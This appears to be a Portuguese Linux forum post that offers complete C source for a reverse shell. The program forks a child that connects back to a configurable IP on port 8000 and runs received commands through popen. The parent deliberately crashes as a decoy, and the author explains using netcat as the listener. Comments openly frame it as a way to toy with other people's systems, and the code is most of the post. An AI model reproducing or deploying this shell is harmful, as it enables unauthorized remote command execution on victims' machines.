reverse shell na marra!
Publicado por felipe (última atualização em 11/12/2024)
[ Hits: 1.001 ]
Esse é um programa de reverse shell criado para linux, ele deve ser compilado e executado sem argumentos.
você deve usar o netcat junto, escutado na porta 8000, ou a que você definir, claro, você vai ter que mudar o ip também.
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> int main(int argc, char **argv) { //cria um segundo processo pid_t pid; struct sockaddr_in destino={ .sin_family = AF_INET, .sin_port = htons(8000), .sin_addr.s_addr = inet_addr("127.0.0.1") }; //inicia pid = fork(); if(pid < 0){ perror("pid error"); return 1; } if(pid == 0){ int sock = socket(AF_INET, SOCK_STREAM, 0); if(sock < 0){ perror("socket error"); return 1; } int cnx = connect(sock, (struct sockaddr *)&destino, sizeof(destino)); if(cnx < 0){ perror("connet error"); return 1; } //brinca com sistema dos outros =p FILE *cmd; char buf[256]; char rec[256]; char *msg = "shell>"; while(1){ send(sock, msg, strlen(msg), 0); recv(sock, rec, 256, 0); cmd = popen(rec, "r"); while(fgets(buf, 256, cmd) != NULL){ send(sock, buf, strlen(buf), 0); } } } else{ //leve engano //bufferOverFlow int lol = atoi(argv[1]) * atoi(argv[2]); } return 0; }
Spieluhr - esse código pode ser considerado um vírus?
[C] Criptografia por Inversão de bits
Algoritmo de euclides estendido (calcula o D RSA)
Resolver problemas de Internet
Como compartilhar a tela do Ubuntu com uma Smart TV (LG, Samsung, etc.)
Descritores de Arquivos e Swappiness
Como instalar no Linux Jogos da Steam só para Windows
Instalando o Team Viewer no Debian Trixie - problema no Policykit
O Que Fazer Após Instalar Ubuntu 25.04